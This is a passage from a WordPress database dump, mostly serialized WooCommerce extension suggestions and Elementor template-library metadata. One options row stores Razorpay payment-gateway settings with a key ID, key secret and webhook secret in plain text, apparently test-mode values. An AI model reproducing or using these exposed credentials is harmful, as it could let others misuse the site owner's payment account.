accounts\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:63:\"https://woocommerce.com/products/teams-woocommerce-memberships/\";}i:6;a:8:{s:4:\"slug\";s:29:\"product-edit-variation-images\";s:7:\"product\";s:39:\"woocommerce-additional-variation-images\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:118:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/additional-variation-images.svg\";s:5:\"title\";s:27:\"Additional Variation Images\";s:4:\"copy\";s:72:\"Showcase your products in the best light with a image for each variation\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:73:\"https://woocommerce.com/products/woocommerce-additional-variation-images/\";}i:7;a:9:{s:4:\"slug\";s:47:\"product-edit-woocommerce-subscription-downloads\";s:7:\"product\";s:34:\"woocommerce-subscription-downloads\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:113:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/subscription-downloads.svg\";s:5:\"title\";s:22:\"Subscription Downloads\";s:4:\"copy\";s:57:\"Give customers special downloads with their subscriptions\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:68:\"https://woocommerce.com/products/woocommerce-subscription-downloads/\";}i:8;a:8:{s:4:\"slug\";s:31:\"product-edit-min-max-quantities\";s:7:\"product\";s:30:\"woocommerce-min-max-quantities\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:109:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/min-max-quantities.svg\";s:5:\"title\";s:18:\"Min/Max Quantities\";s:4:\"copy\";s:81:\"Specify minimum and maximum allowed product quantities for orders to be completed\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:52:\"https://woocommerce.com/products/min-max-quantities/\";}i:9;a:8:{s:4:\"slug\";s:28:\"product-edit-name-your-price\";s:7:\"product\";s:27:\"woocommerce-name-your-price\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/name-your-price.svg\";s:5:\"title\";s:15:\"Name Your Price\";s:4:\"copy\";s:70:\"Let customers pay what they want - useful for donations, tips and more\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/name-your-price/\";}i:10;a:8:{s:4:\"slug\";s:42:\"product-edit-woocommerce-one-page-checkout\";s:7:\"product\";s:29:\"woocommerce-one-page-checkout\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:108:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/one-page-checkout.svg\";s:5:\"title\";s:17:\"One Page Checkout\";s:4:\"copy\";s:92:\"Don\'t make customers click around - let them choose products, checkout & pay all on one page\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:63:\"https://woocommerce.com/products/woocommerce-one-page-checkout/\";}i:11;a:9:{s:4:\"slug\";s:24:\"product-edit-automatewoo\";s:7:\"product\";s:11:\"automatewoo\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:104:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/subscriptions.svg\";s:5:\"title\";s:23:\"Automate your marketing\";s:4:\"copy\";s:89:\"Win customers and keep them coming back with a nearly endless range of powerful workflows\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:45:\"https://woocommerce.com/products/automatewoo/\";}i:12;a:4:{s:4:\"slug\";s:19:\"orders-empty-header\";s:7:\"context\";s:24:\"orders-list-empty-header\";s:5:\"title\";s:20:\"Tools for your store\";s:13:\"allow-dismiss\";b:0;}i:13;a:6:{s:4:\"slug\";s:30:\"orders-empty-footer-browse-all\";s:7:\"context\";s:24:\"orders-list-empty-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:14;a:8:{s:4:\"slug\";s:19:\"orders-empty-wc-pay\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-payments\";s:4:\"icon\";s:111:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/woocommerce-payments.svg\";s:5:\"title\";s:20:\"WooCommerce Payments\";s:4:\"copy\";s:125:\"Securely accept payments and manage transactions directly from your WooCommerce dashboard – no setup costs or monthly fees.\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-payments/\";}i:15;a:8:{s:4:\"slug\";s:19:\"orders-empty-zapier\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:18:\"woocommerce-zapier\";s:4:\"icon\";s:97:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/zapier.svg\";s:5:\"title\";s:6:\"Zapier\";s:4:\"copy\";s:88:\"Save time and increase productivity by connecting your store to more than 1000+ services\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:52:\"https://woocommerce.com/products/woocommerce-zapier/\";}i:16;a:8:{s:4:\"slug\";s:30:\"orders-empty-shipment-tracking\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:29:\"woocommerce-shipment-tracking\";s:4:\"icon\";s:108:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/shipment-tracking.svg\";s:5:\"title\";s:17:\"Shipment Tracking\";s:4:\"copy\";s:86:\"Let customers know when their orders will arrive by adding shipment tracking to emails\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:51:\"https://woocommerce.com/products/shipment-tracking/\";}i:17;a:8:{s:4:\"slug\";s:32:\"orders-empty-table-rate-shipping\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:31:\"woocommerce-table-rate-shipping\";s:4:\"icon\";s:110:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/table-rate-shipping.svg\";s:5:\"title\";s:19:\"Table Rate Shipping\";s:4:\"copy\";s:122:\"Advanced, flexible shipping. Define multiple shipping rates based on location, price, weight, shipping class or item count\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:53:\"https://woocommerce.com/products/table-rate-shipping/\";}i:18;a:8:{s:4:\"slug\";s:40:\"orders-empty-shipping-carrier-extensions\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:4:\"icon\";s:118:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/shipping-carrier-extensions.svg\";s:5:\"title\";s:27:\"Shipping Carrier Extensions\";s:4:\"copy\";s:116:\"Show live rates from FedEx, UPS, USPS and more directly on your store - never under or overcharge for shipping again\";s:11:\"button-text\";s:13:\"Find Carriers\";s:8:\"promoted\";s:26:\"category-shipping-carriers\";s:3:\"url\";s:99:\"https://woocommerce.com/product-category/woocommerce-extensions/shipping-methods/shipping-carriers/\";}i:19;a:8:{s:4:\"slug\";s:32:\"orders-empty-google-product-feed\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:25:\"woocommerce-product-feeds\";s:4:\"icon\";s:110:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/google-product-feed.svg\";s:5:\"title\";s:19:\"Google Product Feed\";s:4:\"copy\";s:76:\"Increase sales by letting customers find you when they\'re shopping on Google\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:53:\"https://woocommerce.com/products/google-product-feed/\";}i:20;a:4:{s:4:\"slug\";s:35:\"products-empty-header-product-types\";s:7:\"context\";s:26:\"products-list-empty-header\";s:5:\"title\";s:23:\"Other types of products\";s:13:\"allow-dismiss\";b:0;}i:21;a:6:{s:4:\"slug\";s:32:\"products-empty-footer-browse-all\";s:7:\"context\";s:26:\"products-list-empty-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:22;a:8:{s:4:\"slug\";s:30:\"products-empty-product-vendors\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:27:\"woocommerce-product-vendors\";s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-vendors.svg\";s:5:\"title\";s:15:\"Product Vendors\";s:4:\"copy\";s:47:\"Turn your store into a multi-vendor marketplace\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-vendors/\";}i:23;a:8:{s:4:\"slug\";s:26:\"products-empty-memberships\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:23:\"woocommerce-memberships\";s:4:\"icon\";s:102:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/memberships.svg\";s:5:\"title\";s:11:\"Memberships\";s:4:\"copy\";s:76:\"Give members access to restricted content or products, for a fee or for free\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:57:\"https://woocommerce.com/products/woocommerce-memberships/\";}i:24;a:9:{s:4:\"slug\";s:35:\"products-empty-woocommerce-deposits\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-deposits\";s:14:\"show-if-active\";a:1:{i:0;s:20:\"woocommerce-bookings\";}s:4:\"icon\";s:99:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/deposits.svg\";s:5:\"title\";s:8:\"Deposits\";s:4:\"copy\";s:75:\"Make it easier for customers to pay by offering a deposit or a payment plan\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-deposits/\";}i:25;a:8:{s:4:\"slug\";s:40:\"products-empty-woocommerce-subscriptions\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:25:\"woocommerce-subscriptions\";s:4:\"icon\";s:104:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/subscriptions.svg\";s:5:\"title\";s:13:\"Subscriptions\";s:4:\"copy\";s:97:\"Let customers subscribe to your products or services and pay on a weekly, monthly or annual basis\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:59:\"https://woocommerce.com/products/woocommerce-subscriptions/\";}i:26;a:8:{s:4:\"slug\";s:35:\"products-empty-woocommerce-bookings\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-bookings\";s:4:\"icon\";s:99:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/bookings.svg\";s:5:\"title\";s:8:\"Bookings\";s:4:\"copy\";s:99:\"Allow customers to book appointments, make reservations or rent equipment without leaving your site\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-bookings/\";}i:27;a:8:{s:4:\"slug\";s:30:\"products-empty-product-bundles\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:27:\"woocommerce-product-bundles\";s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-bundles.svg\";s:5:\"title\";s:15:\"Product Bundles\";s:4:\"copy\";s:49:\"Offer customizable bundles and assembled products\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-bundles/\";}}s:7:\"updated\";i:1665439017;}','no'),(537,'_transient_product-transient-version','1665740610','yes'),(610,'nav_menu_options','a:1:{s:8:\"auto_add\";a:0:{}}','off'),(626,'_transient_wcmp_customer_qna_for_vendor_2','a:0:{}','yes'),(716,'_transient_wcmp_customer_qna_for_vendor_3','a:0:{}','yes'),(827,'_transient_orders-transient-version','1669100112','yes'),(832,'woocommerce_razorpay_settings','a:12:{s:7:\"enabled\";s:3:\"yes\";s:5:\"title\";s:33:\"Credit Card/Debit Card/NetBanking\";s:11:\"description\";s:74:\"Pay securely by Credit or Debit card or Internet Banking through Razorpay.\";s:6:\"key_id\";s:23:\"rzp_test_uLspAPRQgxEJ0S\";s:10:\"key_secret\";s:24:\"5adwp7r9i8xNLer5vQwJb5e6\";s:14:\"payment_action\";s:7:\"capture\";s:21:\"order_success_message\";s:136:\"Thank you for shopping with us. Your account has been charged and your transaction is successful. We will be processing your order soon.\";s:14:\"enable_webhook\";s:2:\"no\";s:14:\"webhook_events\";s:0:\"\";s:14:\"webhook_secret\";s:20:\"&Y2;FiJt1yX-No{z?n!T\";s:12:\"route_enable\";s:2:\"no\";s:21:\"enable_1cc_debug_mode\";s:3:\"yes\";}','yes'),(891,'woocommerce_admin_last_orders_milestone','10','yes'),(973,'elementor_active_kit','584','yes'),(976,'aioseo_options_internal','{\"internal\":{\"validLicenseKey\":null,\"lastActiveVersion\":\"4.1.8\",\"migratedVersion\":\"0.0\",\"siteAnalysis\":{\"connectToken\":null,\"score\":0,\"results\":null,\"competitors\":[]},\"headlineAnalysis\":{\"headlines\":[]},\"wizard\":null,\"category\":null,\"categoryOther\":null,\"deprecatedOptions\":[]},\"integrations\":{\"semrush\":{\"accessToken\":null,\"tokenType\":null,\"expires\":null,\"refreshToken\":null}},\"database\":{\"installedTables\":\"{\\\"wp_aioseo_posts\\\":[\\\"id\\\",\\\"post_id\\\",\\\"title\\\",\\\"description\\\",\\\"keywords\\\",\\\"keyphrases\\\",\\\"page_analysis\\\",\\\"canonical_url\\\",\\\"og_title\\\",\\\"og_description\\\",\\\"og_object_type\\\",\\\"og_image_type\\\",\\\"og_image_url\\\",\\\"og_image_width\\\",\\\"og_image_height\\\",\\\"og_image_custom_url\\\",\\\"og_image_custom_fields\\\",\\\"og_video\\\",\\\"og_custom_url\\\",\\\"og_article_section\\\",\\\"og_article_tags\\\",\\\"twitter_use_og\\\",\\\"twitter_card\\\",\\\"twitter_image_type\\\",\\\"twitter_image_url\\\",\\\"twitter_image_custom_url\\\",\\\"twitter_image_custom_fields\\\",\\\"twitter_title\\\",\\\"twitter_description\\\",\\\"seo_score\\\",\\\"schema_type\\\",\\\"schema_type_options\\\",\\\"pillar_content\\\",\\\"robots_default\\\",\\\"robots_noindex\\\",\\\"robots_noarchive\\\",\\\"robots_nosnippet\\\",\\\"robots_nofollow\\\",\\\"robots_noimageindex\\\",\\\"robots_noodp\\\",\\\"robots_notranslate\\\",\\\"robots_max_snippet\\\",\\\"robots_max_videopreview\\\",\\\"robots_max_imagepreview\\\",\\\"tabs\\\",\\\"images\\\",\\\"image_scan_date\\\",\\\"priority\\\",\\\"frequency\\\",\\\"videos\\\",\\\"video_thumbnail\\\",\\\"video_scan_date\\\",\\\"local_seo\\\",\\\"limit_modified_date\\\",\\\"created\\\",\\\"updated\\\"],\\\"wp_actionscheduler_actions\\\":[],\\\"wp_actionscheduler_logs\\\":[],\\\"wp_actionscheduler_groups\\\":[],\\\"wp_actionscheduler_claims\\\":[],\\\"wp_aioseo_notifications\\\":[]}\"}}','yes'),(977,'aioseo_options_internal_lite','{\"internal\":{\"activated\":1643088604,\"firstActivated\":1643088604,\"installed\":0,\"connect\":{\"key\":null,\"time\":0,\"network\":false,\"token\":null}}}','yes'),(978,'elementor_version','3.9.0','yes'),(979,'elementor_install_history','a:6:{s:5:\"3.5.4\";i:1643088605;s:5:\"3.5.5\";i:1643959709;s:5:\"3.7.8\";i:1665439040;s:5:\"3.8.0\";i:1667166949;s:5:\"3.8.1\";i:1668380448;s:5:\"3.9.0\";i:1670375011;}','yes'),(980,'widget_aioseo-breadcrumb-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(981,'widget_aioseo-html-sitemap-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(983,'aioseo_dynamic_settings_backup','{}','yes'),(984,'_elementor_installed_time','1643088605','yes'),(985,'elementor_remote_info_library','a:3:{s:10:\"types_data\";a:4:{s:5:\"block\";a:2:{s:10:\"categories\";a:30:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:10:\"ehp-footer\";i:9;s:10:\"ehp-header\";i:10;s:3:\"faq\";i:11;s:8:\"features\";i:12;s:6:\"footer\";i:13;s:7:\"Gallery\";i:14;s:6:\"header\";i:15;s:4:\"hero\";i:16;s:11:\"Link in Bio\";i:17;s:9:\"portfolio\";i:18;s:7:\"pricing\";i:19;s:15:\"product archive\";i:20;s:5:\"Quote\";i:21;s:15:\"Service Details\";i:22;s:8:\"services\";i:23;s:11:\"single page\";i:24;s:11:\"single post\";i:25;s:14:\"single product\";i:26;s:5:\"stats\";i:27;s:9:\"subscribe\";i:28;s:4:\"team\";i:29;s:12:\"testimonials\";}s:4:\"sets\";a:5:{i:0;s:11:\"Boxing Club\";i:1;s:19:\"Business Consultant\";i:2;s:16:\"Marketing Agency\";i:3;s:9:\"Wireframe\";i:4;s:15:\"Workshop Center\";}}s:5:\"popup\";a:1:{s:10:\"categories\";a:6:{i:0;s:10:\"bottom bar\";i:1;s:7:\"classic\";i:2;s:6:\"fly-in\";i:3;s:11:\"full screen\";i:4;s:9:\"hello bar\";i:5;s:8:\"slide-in\";}}s:2:\"lp\";a:1:{s:10:\"categories\";a:15:{i:0;s:8:\"Business\";i:1;s:16:\"Coming Soon Page\";i:2;s:9:\"eCommerce\";i:3;s:9:\"Education\";i:4;s:6:\"Events\";i:5;s:18:\"Health and Fitness\";i:6;s:3:\"NFT\";i:7;s:14:\"Online Service\";i:8;s:7:\"Product\";i:9;s:11:\"Real Estate\";i:10;s:18:\"Social Involvement\";i:11;s:14:\"Thank You Page\";i:12;s:6:\"Travel\";i:13;s:18:\"Under Construction\";i:14;s:9:\"Wireframe\";}}s:2:\"lb\";a:1:{s:10:\"categories\";a:2:{i:0;s:4:\"post\";i:1;s:7:\"product\";}}}s:10:\"categories\";a:30:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:10:\"ehp-footer\";i:9;s:10:\"ehp-header\";i:10;s:3:\"faq\";i:11;s:8:\"features\";i:12;s:6:\"footer\";i:13;s:7:\"Gallery\";i:14;s:6:\"header\";i:15;s:4:\"hero\";i:16;s:11:\"Link in Bio\";i:17;s:9:\"portfolio\";i:18;s:7:\"pricing\";i:19;s:15:\"product archive\";i:20;s:5:\"Quote\";i:21;s:15:\"Service Details\";i:22;s:8:\"services\";i:23;s:11:\"single page\";i:24;s:11:\"single post\";i:25;s:14:\"single product\";i:26;s:5:\"stats\";i:27;s:9:\"subscribe\";i:28;s:4:\"team\";i:29;s:12:\"testimonials\";}s:9:\"templates\";a:823:{i:0;a:20:{s:4:\"tmpl\";i:1280;s:2:\"id\";i:22403;s:5:\"title\";s:40:\"Hello Bar | Subscribe | Aesthetic Clinic\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/aesthetic-clinic-19.jpg\";s:12:\"tmpl_created\";i:1647354307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/hello-bar-subscribe-aesthetic-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:48:\"[\"Barbershop\",\"Business\",\"Discount\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:1;a:20:{s:4:\"tmpl\";i:1281;s:2:\"id\";i:22410;s:5:\"title\";s:32:\"Fly-In | Discount | Hair Stylist\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/hair-stylist-20.jpg\";s:12:\"tmpl_created\";i:1647354614;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-discount-hair-stylist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:32:\"[\"Barbershop\",\"Discount\",\"Hair\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:2;a:20:{s:4:\"tmpl\";i:1285;s:2:\"id\";i:22440;s:5:\"title\";s:32:\"Classic | Subscribe | Shoe Store\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/shoes-store-21.jpg\";s:12:\"tmpl_created\";i:1647418620;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-subscribe-shoe-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:37:\"[\"Ecommerce\",\"Marketing\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:3;a:20:{s:4:\"tmpl\";i:1286;s:2:\"id\";i:22446;s:5:\"title\";s:37:\"Full Screen | Subscribe | Denim Store\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/denim-store-22.jpg\";s:12:\"tmpl_created\";i:1647419614;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/full-screen-subscribe-denim-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:35:\"[\"Ecommerce\",\"Fashion\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:4;a:20:{s:4:\"tmpl\";i:1287;s:2:\"id\";i:22452;s:5:\"title\";s:37:\"Fly-In | Subscribe | Pizza Restaurant\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/pizza-restaurant-23.jpg\";s:12:\"tmpl_created\";i:1647420733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-subscribe-pizza-restaurant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:19:\"[\"Business\",\"Food\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:5;a:20:{s:4:\"tmpl\";i:1288;s:2:\"id\";i:22458;s:5:\"title\";s:38:\"Full Screen | Subscribe | Fashion Shop\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/fashion-shop-24.jpg\";s:12:\"tmpl_created\";i:1647426379;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-subscribe-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:31:\"[\"Ecommerce\",\"Fashion\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:6;a:20:{s:4:\"tmpl\";i:1289;s:2:\"id\";i:22464;s:5:\"title\";s:32:\"Fly-In | Contact | Makeup Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/makeup-studio-25.jpg\";s:12:\"tmpl_created\";i:1647427026;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-contact-makeup-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:22:\"[\"Business\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:7;a:20:{s:4:\"tmpl\";i:1290;s:2:\"id\";i:22470;s:5:\"title\";s:32:\"Fly-In | Contact | Design Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/design-studio-26.jpg\";s:12:\"tmpl_created\";i:1647428250;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-contact-design-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:39:\"[\"Business\",\"Contact\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:8;a:20:{s:4:\"tmpl\";i:1291;s:2:\"id\";i:22480;s:5:\"title\";s:27:\"Classic | CTA | MasterClass\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/master-class-27.jpg\";s:12:\"tmpl_created\";i:1647428474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-masterclass/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"cta\",\"Magazine\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:9;a:20:{s:4:\"tmpl\";i:1292;s:2:\"id\";i:22489;s:5:\"title\";s:29:\"Classic | CTA | Music Concert\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/music-concert-29.jpg\";s:12:\"tmpl_created\";i:1647429738;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-music-concert/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"cta\",\"Landing 